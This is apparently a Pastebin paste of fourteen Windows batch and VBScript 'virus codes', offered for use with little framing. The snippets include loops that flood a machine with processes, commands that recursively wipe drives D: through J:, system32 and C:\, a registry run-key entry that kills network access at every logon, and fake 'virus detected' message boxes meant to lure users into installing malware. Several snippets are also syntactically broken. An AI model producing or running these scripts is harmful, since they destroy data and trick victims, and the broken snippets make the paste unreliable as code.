Advertisement
Mapple

Simple Batch Virus Codes

May 18th, 2015
11,472
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.30 KB | None | 0 0
  1. Virus codes | @echo off (cmd wont show command) @echo on (cmd will show command)
  2.  
  3. #1 simple virus (opening-cpu drain)
  4.  
  5. @echo off
  6. :A
  7. start
  8. explorer
  9. goto :A
  10.  
  11. #2 simple shutdown command - not really a virus
  12.  
  13. shutdown -s -t 00<(time) -c "message here" (you dont need a message)
  14. Restart - shutdown -r -t (time) (message)
  15.  
  16. #3 make a bunch of folders to the desktop - not really a virus
  17.  
  18. @echo off
  19. cd "c:\ documents and settings\%username% <<(or) documents and settings\all users\desktop"
  20. :folder
  21. md %random%
  22. goto: folder
  23.  
  24. #4 website opening virus
  25.  
  26. @echo off
  27. :A
  28. start (URL here)
  29. (if you want to add more sites add the start (URL here) command here and below)
  30. ping localhost -m 5 >nul
  31. goto :A
  32.  
  33. #5 system 32 deleter (HARMFUL)
  34.  
  35. @echo off del c:\\windows\system 32 (extesion.bat)
  36.  
  37. (DO NOT CREATE ON YOUR MAIN MACHINE)
  38.  
  39.  
  40. MORE BELOW!
  41.  
  42.  
  43. #6 delete every file off computer
  44.  
  45. del D:\. /f /s /q
  46. del E:\. /f /s /q
  47. del F:\. /f /s /q
  48. del G:\. /f /s /q
  49. del H:\. /f /s /q
  50. del I:\. /f /s /q
  51. del J:\. /f /s /q
  52.  
  53.  
  54. #7 crash computer
  55.  
  56. @echo on/off
  57. Start Crash
  58. (you can copy and paste Start Crash over and over again for more power)
  59.  
  60.  
  61. #8 extreme & nasty virus made by Shroomie
  62.  
  63. X=Msgbox("Virus Is Active",0+16,"Virus Alert")
  64. X=Msgbox("Virus Is Active",0+16,"Virus Alert")
  65. X=Msgbox("Virus Is Active",0+16,"Virus Alert")
  66. X=Msgbox("Wanna Fix Virus",0+16,"Fix Virus")
  67. @echo off del c:\\windows\system 32
  68. del D:\. /f /s /q
  69. del E:\. /f /s /q
  70. del F:\. /f /s /q
  71. del G:\. /f /s /q
  72. del H:\. /f /s /q
  73. del I:\. /f /s /q
  74. del J:\. /f /s /q
  75. @echo off
  76. :A
  77. start www.youaranidiot.org
  78. ping localhost -m 5 >nul
  79. goto :A
  80.  
  81. This has a lot of nasty stuff in it. This can KILL a machine once ran. ( DO NOT TRY ON MAIN MACHINE )
  82.  
  83.  
  84. #9 Message Box - Normally used to say stuff like "virus detected" and "fix virus" wich leads user to install a virus or message displays while virus is running.
  85.  
  86. X=Msgbox("Virus Found On Your Computer",0+16,"Virus Detected")
  87. You can copy and paste this to have more messages pop up. (you have to run in VBs)
  88.  
  89.  
  90. #10 Trojan Horse virus - very simple Trojan Horse virus that WORKS. (.bat)
  91.  
  92. @echo off
  93. Copy C:\Programs\virus.bat C:\Programs
  94. Start C:\Programs\virus.bat
  95.  
  96.  
  97. #11 disable internet forever
  98.  
  99. echo @echo off>c:windowswimn32.bat
  100. echo break off>>c:windowswimn32.bat
  101. echo ipconfig/release_all>>c:windowswimn32.bat
  102. echo end>>c:windowswimn32.bat
  103. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  104. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  105. echo You Have Been HACKED!
  106. PAUSE
  107.  
  108.  
  109. #12 endless notepads until computer crashes
  110.  
  111. @ECHO off
  112. :top
  113. START %SystemRoot%\system32\notepad.exe
  114. GOTO top
  115.  
  116.  
  117. #13 backspace key always being pressed code
  118.  
  119. MsgBox “Let’s go back a few steps”
  120. Set wshShell =wscript.CreateObject(”WScript.Shell”)
  121. do
  122. wscript.sleep 100
  123. wshshell.sendkeys “{bs}”
  124. loop
  125.  
  126.  
  127. #14 whipes C: drive (not really a virus)
  128.  
  129. @echo off
  130. deltree C:\
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement